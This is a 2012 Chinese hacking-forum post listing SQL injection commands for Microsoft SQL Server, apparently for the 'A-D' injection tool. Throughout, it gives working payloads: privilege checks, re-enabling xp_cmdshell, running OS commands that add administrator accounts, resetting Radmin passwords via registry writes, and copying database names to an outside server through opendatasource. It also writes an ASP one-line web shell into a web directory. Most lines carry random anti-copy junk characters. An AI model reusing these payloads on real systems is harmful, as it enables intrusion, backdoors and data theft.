中国网络渗透测试联盟

标题: 阿D常用的一些注入命令 [打印本页]
作者: admin    时间: 2012-9-13 17:26
标题: 阿D常用的一些注入命令
阿D常用的一些注入命令+ P( J9 [: Z1 }" P
//看看是什么权限的
0 K/ R" r1 @$ G) u5 y% D, ~and 1=(Select IS_MEMBER('db_owner'))
7 i/ a+ Y, D+ k) ^And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--  H* J' x7 e8 ]* j% `

4 s" {/ L" X; ~4 {. r2 ~* E$ F( k//检测是否有读取某数据库的权限! Y7 N/ j& Y: U: g5 o
and 1= (Select HAS_DBACCESS('master'))6 L8 ]! ?+ s9 _; w8 P
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --# m* o  \4 T5 Y5 S9 \7 }8 {2 N3 n: Z0 h7 K
  [8 M. A6 @2 h( o0 |' U9 s+ \

. J+ w0 |, W8 f+ ?+ h. g数字类型' c, R0 V. x' t5 {" a7 L
and char(124)%2Buser%2Bchar(124)=0
9 p$ j: l1 J$ I+ q* w- J; u& j
0 R, S$ g* Y8 W9 _5 R1 d字符类型
: w2 w8 C' @, M0 U. M' and char(124)%2Buser%2Bchar(124)=0 and ''=': k5 f! `% x& h8 K, C# ~

4 H2 R; V7 H8 N9 h! ?7 O$ U3 @/ d6 O搜索类型
) L2 u! m# O7 y( O' and char(124)%2Buser%2Bchar(124)=0 and '%'='' f' D2 A- z5 I/ @: d7 y
( k+ B' T+ l; l! d* U8 S* \
爆用户名
, V- i# a0 w* Z- h3 vand user>04 Z" S$ {2 S% l2 z3 K0 c; T7 h
' and user>0 and ''='
, Q; g3 c! f7 D8 U* E
! t& W0 ^$ r3 T) {" W8 \4 v" V! `检测是否为SA权限! e. y. j5 v# v
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
9 \$ U$ a* f. B; Z* t1 EAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
! w( s; Q% L: x8 V- I1 Q1 {6 W# t( ]3 a  E$ X0 ]# P6 H
检测是不是MSSQL数据库
# x1 u& b9 S8 y5 u, Z6 F3 L1 }! e- ~and exists (select * from sysobjects);--
3 P% m/ }' \, G% a( ?/ w2 t# X3 X6 {, Q" H% z) G
检测是否支持多行
/ j. D, n* p8 K;declare @d int;--
) d" K; L9 K1 ?0 P! ~: S/ x" `
4 J3 r, z0 p# x4 K+ K; P3 }2 ^  J1 Q恢复 xp_cmdshell
* L; p9 L2 O1 Z3 m! w) y# U+ f0 T" N/ e;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
6 z. z* V6 F9 p3 Q2 j" _  M9 u8 A, G' h( p$ ^) i; L2 r
( c! R# l( ]: ]" P7 L6 L
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version') / ?9 A8 s* T( i
- x9 U5 p9 @! p* H/ P# q
//-----------------------. t- o/ N+ N8 T- ^1 e& ?  B* _
//      执行命令
( N, ]; ], ]2 X" {! C/ j//-----------------------; O7 V3 o5 f7 q, H; r9 g( [  ?5 t6 v% a
首先开启沙盘模式:; C  k0 D' g2 }3 J
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',13 Q/ @5 H: s8 \1 A" i+ v# N

" k6 B0 [! N. Z& @7 K  Y9 V然后利用jet.oledb执行系统命令
  x! s3 Q% c9 O6 U8 cselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')$ m/ A8 s, U2 L8 n9 l# z5 {- F
9 g+ q) ?% X" S- J! j6 G# P, _1 V. [, ?
执行命令
) N- e% A! S! g" R( O: `! }9 A;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--- L# U8 |9 ]! T
. M/ ]. X/ Q! i  Y0 G
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
0 @2 [* S8 g2 t1 E
- `1 J$ O* P: `. d; M4 r' l判断xp_cmdshell扩展存储过程是否存在:
+ K  @* `! V8 X/ w, v, ~9 `http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
% J- M! M" o9 Q, X1 c3 }7 ^% A/ T* H& Y9 s  c0 V" c9 Q
写注册表4 p5 |6 U( Y! K0 L+ y/ U  U. Y
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',11 v3 S% {6 V* _; Z, a; f

( P/ x9 g+ @, G' `& c+ R7 V7 A' e9 hREG_SZ
2 y+ m) L( X* v& Z' G, J: x
! D, D  h/ k( ?0 B% [读注册表3 d- T+ G3 y' E# @
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
! y+ D" F, W) a" s1 E* a
! y  m8 _$ _# o" I8 [$ J读取目录内容8 @5 a/ v/ s: ?1 n) l0 a  t* A
exec master..xp_dirtree 'c:\winnt\system32\',1,15 m/ s/ v1 |5 ^% O; @/ N: x% ^

2 L2 z/ e, y* |9 U) u" \9 C
+ ?3 g% a: W+ D- h数据库备份6 p, W, I5 f6 ^
backup database pubs to disk = 'c:\123.bak'% s0 W+ r% ?  k+ Q4 e
$ O) V& }! B0 J4 e0 M- w2 x
//爆出长度8 O) t# I: ~; r! j  D1 K0 i
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
0 G9 N5 K2 d- i6 Y8 n+ m6 V! M0 \5 i( f3 a
; c$ I; {. i2 Q! z' L! |; r  ~

4 z) b4 h" |/ Q- l$ @更改sa口令方法:用sql综合利用工具连接后,执行命令:$ `' I: l/ ~- ?! o0 _
exec sp_password NULL,'新密码','sa'
/ v0 R. x+ ?0 B5 G" _* |5 ^, R7 t
1 M; N7 w  i7 `添加和删除一个SA权限的用户test:
& }& Y1 c. w+ D. ^) r$ ^exec master.dbo.sp_addlogin test,ptlove6 W' m% u# ]" H" u+ f2 O: Y/ Z
exec master.dbo.sp_addsrvrolemember test,sysadmin
5 g/ c# r* H) d( C8 S
% [- [+ c4 n8 @; P) z! }( g删除扩展存储过过程xp_cmdshell的语句: 1 F3 I5 `0 w) S% U) n
exec sp_dropextendedproc 'xp_cmdshell'' v$ e, `  Z6 @$ C+ W3 Y
5 s2 ]& @! k1 W8 U4 u) V' ^8 q
添加扩展存储过过程' S+ _, e2 U6 c, s* }# g( x
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll' 0 T5 t# ?& i9 r* v: P
GRANT exec On xp_proxiedadata TO public & h) [6 K; Y3 K
) s# c% o  w) X* s2 f& j9 S

/ V7 z% o+ J$ J" B: @6 O) L停掉或激活某个服务。 % K3 S1 @; z+ g; R

; g$ i1 P5 ?5 Y% a3 fexec master..xp_servicecontrol 'stop','schedule'
) U3 B' L& ~9 |exec master..xp_servicecontrol 'start','schedule') M, V7 H( a' c+ q8 u2 T
: K, K- i% p5 l& q; p# R
dbo.xp_subdirs
# S( @* f8 A$ \& U# S. B( ?. ]0 w8 q% z: T) L+ e" h
只列某个目录下的子目录。
% x7 r! p; A/ z( d4 sxp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'- O) i7 p. B- T8 }  ~: m
! K9 Q  e* i& f5 D1 I0 F& _( G
dbo.xp_makecab6 i' l: E% P8 k3 J; [# F

' |0 l1 g4 q8 ~+ q1 i1 H$ Q1 G* Q将目标多个档案压缩到某个目标档案之内。
/ {: Y" ]% m8 ~. |% _所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。$ _0 k" s, |0 `  \5 t% u6 z
8 p* ]6 a4 s9 T) B% o3 H4 \" P2 M
dbo.xp_makecab8 `3 t# X) y& r6 p
'c:\test.cab','mszip',1,
$ N/ ~/ S+ b* B" q$ Y3 s& Z'C:\Inetpub\wwwroot\SQLInject\login.asp',
8 l# |$ ^1 P4 R$ f! G5 m1 _'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
. J" u! x9 C. y3 r! z- C4 j4 f" d3 N1 u8 `
xp_terminate_process5 E& A$ l3 }  ^, c

( ^9 Q, j1 v$ Y' A/ _停掉某个执行中的程序,但赋予的参数是 Process ID。# r0 C6 w6 C; A: U( g
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID+ X. d5 \# L0 X, P; W) u3 A

% ~* v. j7 }1 L2 F* wxp_terminate_process 24840 a' W) ~1 w" z. F9 I
1 {! K0 _: S9 i" t9 l5 S
xp_unpackcab% S) l  W- m6 w* l1 {2 y
3 T: `1 ^, c' i8 c
解开压缩档。' \4 f% j+ {3 V1 i2 ~. _2 w- o
# |! ?8 t, x( U, R$ q* c
xp_unpackcab 'c:\test.cab','c:\temp',1
' z" m. `- J; y& M/ O
0 b/ k$ P/ }' C( q4 ^7 `% f( T2 b* f4 F$ d1 S) f; X6 N
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
* D$ o' o0 L9 ?2 h: v" t, ^- a5 G  h' W
create database lcx;
5 C3 U" W) V8 ]5 u6 i/ I# hCreate TABLE ku(name nvarchar(256) null);3 J7 w# K0 i. }% U; X
Create TABLE biao(id int NULL,name nvarchar(256) null);
4 l& K# A' G* ?* l% I& v9 V1 Y# Z5 N3 ]/ h+ z4 k( Z9 L
//得到数据库名& ~8 ~6 N" n* V( y2 C6 N
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases3 s& r4 Z) ^7 Y
& O0 x# n9 y) A- f% \9 q
. J$ g& E, n9 a) g& n$ l
//在Master中创建表,看看权限怎样/ p2 [; i2 |! T. |1 e3 s3 G
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
" _1 A8 n# ?* z1 ^4 L* s: u& r* P9 T) ]/ x
用 sp_makewebtask直接在web目录里写入一句话马:8 G$ p2 ]1 ]0 n8 I
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
; D" _. N7 C# x2 `4 _+ V+ Z* d; E' d
3 b, \1 }$ O6 k8 n8 [: W( {! H//更新表内容2 N! N  o! M- d
Update films SET kind = 'Dramatic' Where id = 123
2 ?- u6 m2 k  F% o% q" Y
7 I3 h1 k$ @3 K' ?) h//删除内容+ u: w8 D$ ^) `2 g, H
delete from table_name where Stockid = 3



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2